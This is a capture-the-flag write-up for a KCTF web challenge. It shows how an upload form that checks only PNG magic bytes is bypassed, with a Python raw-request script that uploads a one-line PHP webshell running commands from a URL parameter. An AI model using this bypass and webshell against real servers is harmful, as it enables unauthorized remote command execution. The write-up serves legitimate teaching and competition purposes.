[Original] KCTF warm-up challenge 逐光启航 WriteUp

Posted: 2024-8-21 16:10
The challenge's main page links to hint.php.
The page source of hint.php contains a base64-encoded reference to hidden_page.php.
Visiting it shows an upload form; attempting an upload reports that only .jpg and .png files are accepted.
Testing showed that the format check on the uploaded file looks only at the file header (magic bytes) and does not restrict the extension, so a .php file whose content starts with a PNG signature can be uploaded.
```python
def sendraw(host, port, data, tls=False):
    """Send a raw HTTP request over a plain socket and return the response body."""
    import ssl, socket
    from http.client import HTTPResponse
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    if tls:
        # ssl.wrap_socket() was removed in Python 3.12; use a context instead
        s = ssl.create_default_context().wrap_socket(s, server_hostname=host)
    if isinstance(data, str):
        data = data.encode('latin-1')
    s.sendall(data)
    resp = HTTPResponse(s)
    resp.begin()
    res = resp.read()
    s.close()
    return res

# Request line and headers, split where Content-Length has to be filled in
header_part1 = b'POST /hidden_page.php HTTP/1.1\r\nHost: 0bfdcec0-7c78-45ba-a7b9-1c58ac076038.node.pediy.com:81\r\nContent-Length: '
header_part2 = b'\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: http://0bfdcec0-7c78-45ba-a7b9-1c58ac076038.node.pediy.com:81\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nReferer: http://0bfdcec0-7c78-45ba-a7b9-1c58ac076038.node.pediy.com:81/hidden_page.php\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7\r\nConnection: close\r\n\r\n'

# Multipart body: the file part keeps filename="test.php" but declares image/png
data_part1 = b'------WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nContent-Disposition: form-data; name="upload_file"; filename="test.php"\r\nContent-Type: image/png\r\n\r\n'
# The "submit" field value is the UTF-8 encoding of the Chinese word for "upload"
data_part2 = b'\r\n------WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nContent-Disposition: form-data; name="submit"\r\n\r\n\xe4\xb8\x8a\xe4\xbc\xa0\r\n------WebKitFormBoundarydhHx9Ablqmk1ZA7n--\r\n'

# First 8 bytes of any PNG are the PNG signature, which is all the server checks;
# everything after it is the PHP webshell
data = open('anypic.png', 'rb').read()[:8] + b'<?php system($_GET[\'cmd\']); ?>'
data = data_part1 + data + data_part2
payload = header_part1 + str(len(data)).encode('latin1') + header_part2 + data
r = sendraw('123.57.66.184', 81, payload)
print(r.decode('utf-8', errors='replace'))
```
The challenge also exposes an upload directory; requesting upload/test.php reaches the uploaded PHP shell.
Flag: flag{a7031be5-c28f-4c14-ad3d-9a763702c05d}
Last edited on 2024-9-6 13:22 by tacesrever